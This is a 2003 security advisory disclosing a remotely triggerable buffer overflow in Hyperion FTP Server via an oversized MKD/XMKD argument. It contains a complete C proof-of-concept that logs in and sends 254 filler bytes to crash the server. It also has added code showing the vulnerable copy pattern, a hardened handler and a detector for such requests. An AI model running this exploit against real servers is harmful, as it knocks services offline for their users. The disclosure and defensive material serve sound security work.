
Rushjo@tripbit.org
04/04/03, 19:35
TA-2003-03 Buffer Overflow Vulnerability in Hyperion FTP Server 3.0
contributed by: rushjo
================================================================================

Tripbit Security Advisory

TA-2003-03 Buffer Overflow Vulnerability in Hyperion FTP Server 3.0
================================================================================



PROGRAM: Hyperion FTP Server
HOMEPAGE: http://www.mollensoft.com
VULNERABLE VERSIONS: 2.7 and 3.0 (the current release at the time of writing)
RISK: Medium/High
IMPACT: Denial of Service and possible remote code execution (only the crash is demonstrated)
RELEASE DATE: 2003-03


================================================================================

TABLE OF CONTENTS
================================================================================



1.........................................................DESCRIPTION
2.............................................................DETAILS
3.............................................................EXPLOIT
4...........................................................SOLUTIONS
5.......................................................VENDOR STATUS
6.............................................................CREDITS
7..........................................................DISCLAIMER
8..........................................................REFERENCES
9............................................................FEEDBACK


1. DESCRIPTION
================================================================================



Hyperion FTP Server is a small FTP server program for Windows. It is
made by Mollensoft and supports the full set of FTP server commands.


2. DETAILS
================================================================================



* Remote DoS:


A security vulnerability in Hyperion FTP Server allows remote attackers
to crash the server by issuing the MKD (make directory) command with an
argument of 251 bytes or more. The proof of concept in section 3 sends
XMKD, the RFC 959 alias of MKD, with 254 bytes of filler.


The command can be issued to the FTP server either by a valid
authenticated user or by a guest/anonymous account (if this is
enabled), so on servers that allow anonymous login the crash needs no
credentials at all.
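The pattern behind a crash like this, as an added example that is not Hyperion's code (Mollensoft's source is not public and the advisory does not show it): an MKD handler that copies the directory name into a fixed stack buffer, beside a handler that checks the length before it copies. The buffer size (251 bytes, room for 250 characters plus the terminator) is an assumption chosen to match the advisory's 251-byte threshold, as are the function names and the reply texts.

```c
#include <stdio.h>
#include <string.h>

/* Assumption for illustration: the handler copies the directory name into a
 * fixed stack buffer of 251 bytes. 250 characters plus the NUL fit; the
 * 251-character argument the advisory reports as the threshold does not. */
#define MKD_BUF      251
#define MKD_MAX_ARG  (MKD_BUF - 1)

/* Fill dst with n 'A' bytes plus a terminator (dst must hold n + 1 bytes). */
void make_arg(char *dst, size_t n)
{
    memset(dst, 'A', n);
    dst[n] = '\0';
}

/* Vulnerable pattern: unbounded copy into a fixed buffer. Reachable by any
 * logged-in user, anonymous included, so the crash needs no privileges.
 * Returns the FTP reply code written into reply. */
int mkd_vulnerable(const char *arg, char *reply, size_t replysz)
{
    char path[MKD_BUF];
    strcpy(path, arg);                  /* writes past path[] when strlen(arg) > 250 */
    snprintf(reply, replysz, "257 \"%s\" created", path);
    return 257;
}

/* Hardened form: validate the length before touching the buffer, then copy
 * with a bound derived from the buffer size, not from the input. */
int mkd_hardened(const char *arg, char *reply, size_t replysz)
{
    char path[MKD_BUF];
    size_t n = strlen(arg);

    if (n == 0) {
        snprintf(reply, replysz, "501 Syntax error: directory name required");
        return 501;
    }
    if (n > MKD_MAX_ARG) {
        snprintf(reply, replysz, "501 Directory name too long (max %d bytes)", MKD_MAX_ARG);
        return 501;
    }
    memcpy(path, arg, n + 1);           /* n + 1 <= MKD_BUF, guaranteed above */
    snprintf(reply, replysz, "257 \"%s\" created", path);
    return 257;
}

int main(void)
{
    char arg[512], reply[512];
    size_t sizes[] = { 10, 250, 251, 300 };

    /* Only the hardened handler is driven with over-long input here: calling
     * mkd_vulnerable() with 251+ bytes corrupts this process's own stack. */
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++) {
        make_arg(arg, sizes[i]);
        int code = mkd_hardened(arg, reply, sizeof reply);
        printf("%3zu-byte argument -> %d %s\n", sizes[i], code,
               code == 257 ? "created" : reply);
    }
    return 0;
}
```

The check in mkd_hardened is against the destination's capacity, which is why the 250/251 boundary is exact; a strncpy with the input length as the bound would not have helped, and a strncpy bounded by the buffer size would silently drop the terminator at exactly 251 bytes.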



3. EXPLOIT
================================================================================



This is a proof-of-concept exploit for this buffer overflow
vulnerability.


NOTE: This is only for INFORMATION purposes and not for any
destructive acts!


/*******************************************************************************
 *
 * Denial of Service Attack for Mollensoft Hyperion FTP Server 3.0
 * ---------------------------------------------------------------
 *
 * Note: This paper is ONLY for INFORMATION purposes and not for any
 * destructive acts!
 *
 *
 * Tripbit Security Development
 * Author: posidron
 * Website: tripbit.org
 *
 * Vulnerable Version:
 * + Hyperion 3.0
 * + Hyperion 2.7
 *
 * Compile:
 * bcc32 -lx ws2_32.lib hyperion.c
 *
 * Execute:
 * hyperion <host> <user> <pass>
 *
 * Thx:
 * MisterMoe, Rushjo, Tec, PeaceTreaty, seth
 *
 *******************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>   /* before windows.h, which otherwise pulls in the old winsock.h */
#include <windows.h>

#define A 0x41                  /* 'A': filler byte for the oversized argument */
#define PORT 21
#define MAX_BUFFER 255          /* 254 filler bytes + NUL, past the 251-byte threshold */
#define MAX_PACKET_BUFFER 1024

int winsock(void);

void usage(char *prog_name)
{
    printf("Usage: %s <host> <user> <pass>\n", prog_name);
    exit(-1);
}

int main(int argc, char *argv[])
{
    char buffer[MAX_BUFFER], packet_buffer[MAX_PACKET_BUFFER];
    int rc;
    SOCKET s;
    SOCKADDR_IN addr;

    if(argc < 4) usage(argv[0]);

    rc = winsock();
    if(rc != 0)
    {
        printf("Can't start Winsock!, Error code: %d\n", rc);
        return 1;
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    if(s == INVALID_SOCKET)
    {
        printf("Can't start Socket!, Error code: %d\n", WSAGetLastError());
        return 1;
    }

    /* host is taken as a dotted-quad address; no DNS lookup is done */
    memset(&addr, 0, sizeof(SOCKADDR_IN));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr(argv[1]);

    rc = connect(s, (SOCKADDR*)&addr, sizeof(SOCKADDR));
    if(rc == SOCKET_ERROR)
    {
        printf("Can't connect!, Error code: %d\n", WSAGetLastError());
        return 1;
    }

    printf("Connected to %s \n", argv[1]);
    printf("Preparing attack!\n");

    /* read the banner, then log in (anonymous works where the server allows it) */
    recv(s, packet_buffer, MAX_PACKET_BUFFER, 0);
    sprintf(packet_buffer, "USER %s\r\n", argv[2]);
    send(s, packet_buffer, strlen(packet_buffer), 0);

    recv(s, packet_buffer, MAX_PACKET_BUFFER, 0);
    sprintf(packet_buffer, "PASS %s\r\n", argv[3]);
    send(s, packet_buffer, strlen(packet_buffer), 0);

    recv(s, packet_buffer, MAX_PACKET_BUFFER, 0);

    /* 254 'A's; XMKD is the RFC 959 alias of MKD, the command the advisory names */
    memset(buffer, A, MAX_BUFFER);
    buffer[MAX_BUFFER-1] = 0;

    sprintf(packet_buffer, "XMKD %s\r\n", buffer);
    send(s, packet_buffer, strlen(packet_buffer), 0);
    recv(s, packet_buffer, MAX_PACKET_BUFFER, 0);   /* returns when the server answers or dies */

    Sleep(1000);
    shutdown(s, SD_BOTH);
    closesocket(s);
    WSACleanup();
    printf("Attack done!\n");
    return 0;
}

int winsock(void)
{
    WSADATA wsa;
    return WSAStartup(MAKEWORD(2,0), &wsa);
}



This request crashes the Hyperion FTP Server process (the original advisory describes the result as a "segmentation fault"), taking the service down until it is restarted.
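For the defensive side, an added example that is not from the advisory or the vendor: a scanner that takes FTP control-channel lines as a capture or proxy log would present them, upper-cases the verb, treats XMKD as the RFC 959 alias of MKD, and flags any directory-creation request whose argument reaches the advisory's 251-byte threshold. The sample session, the function names and the 16-byte verb buffer are constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* From the advisory: MKD with an argument of 251 bytes or more crashes
 * Hyperion FTP Server 2.7 and 3.0. */
#define MKD_ARG_LIMIT 251

/* Split one control-channel line ("VERB [argument]\r\n") into an upper-cased
 * verb and an argument pointer/length, with trailing CR/LF stripped.
 * Returns the verb length, or 0 for an empty line. */
size_t ftp_split(const char *line, char *verb, size_t verbsz,
                 const char **arg, size_t *arglen)
{
    size_t len = strlen(line), i = 0, v = 0;

    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;
    while (i < len && line[i] != ' ') {
        if (v + 1 < verbsz)                     /* truncate the verb, never overflow */
            verb[v++] = (char)toupper((unsigned char)line[i]);
        i++;
    }
    verb[v] = '\0';
    while (i < len && line[i] == ' ')
        i++;
    *arg = line + i;
    *arglen = len - i;
    return v;
}

/* 1 if the line is MKD (or its RFC 959 alias XMKD) with an argument long
 * enough to reach the overflow, else 0. */
int ftp_mkd_oversize(const char *line)
{
    char verb[16];
    const char *arg;
    size_t arglen;

    if (ftp_split(line, verb, sizeof verb, &arg, &arglen) == 0)
        return 0;
    if (strcmp(verb, "MKD") != 0 && strcmp(verb, "XMKD") != 0)
        return 0;
    return arglen >= MKD_ARG_LIMIT;
}

/* Build "VERB " + n 'A's + CRLF in dst, clipping n so the line always fits. */
void make_mkd_line(char *dst, size_t dstsz, const char *verb, size_t n)
{
    snprintf(dst, dstsz, "%s ", verb);
    size_t p = strlen(dst);
    if (p + n + 3 > dstsz)
        n = dstsz - p - 3;
    memset(dst + p, 'A', n);
    memcpy(dst + p + n, "\r\n", 3);             /* CR, LF and the terminator */
}

/* Scan captured lines, print one alert per hit, return the number of hits. */
int scan_capture(const char *const *lines, size_t n)
{
    int hits = 0;
    for (size_t k = 0; k < n; k++) {
        char verb[16];
        const char *arg;
        size_t arglen;
        if (!ftp_mkd_oversize(lines[k]))
            continue;
        ftp_split(lines[k], verb, sizeof verb, &arg, &arglen);
        printf("ALERT line %zu: %s with %zu-byte argument (limit %d)\n",
               k + 1, verb, arglen, MKD_ARG_LIMIT);
        hits++;
    }
    return hits;
}

/* Constructed sample session; the advisory's PoC sends XMKD with 254 'A's. */
int demo_session(void)
{
    char poc[300], lower[300], edge[300];
    make_mkd_line(poc, sizeof poc, "XMKD", 254);     /* what the PoC sends */
    make_mkd_line(lower, sizeof lower, "mkd", 251);  /* lower-case verb, at threshold */
    make_mkd_line(edge, sizeof edge, "MKD", 250);    /* one byte short: not flagged */
    const char *lines[] = {
        "USER anonymous\r\n", "PASS guest@example.org\r\n",
        "MKD upload\r\n", poc, lower, edge, "XMKD\r\n", "QUIT\r\n",
    };
    return scan_capture(lines, sizeof lines / sizeof lines[0]);
}

int main(void)
{
    printf("%d suspicious MKD/XMKD request(s)\n", demo_session());
    return 0;
}
```

Matching on the normalised verb rather than on the raw bytes is what catches the lower-case "mkd" and the XMKD alias the PoC actually uses; a signature that looked only for "MKD " followed by a run of A's would miss both and also any attacker who swaps the filler byte.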



4. SOLUTIONS
================================================================================



No vendor fix for the moment. Until one is available, restricting access
to the control port (TCP 21) to trusted hosts and disabling anonymous
login limit who can reach the crash, since the command is only accepted
after login.



5. VENDOR STATUS
================================================================================



The vendor has been notified but has not responded to this report.



6. CREDITS
================================================================================



Discovered by posidron



7. DISCLAIMER
================================================================================


The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.



8. REFERENCES
================================================================================


- Original Version:
http://www.tripbit.org


9. FEEDBACK
================================================================================


Please send suggestions, updates, and comments to:


Tripbit Security Advisory
http://www.tripbit.org
rushjo@tripbit.org
posidron@tripbit.org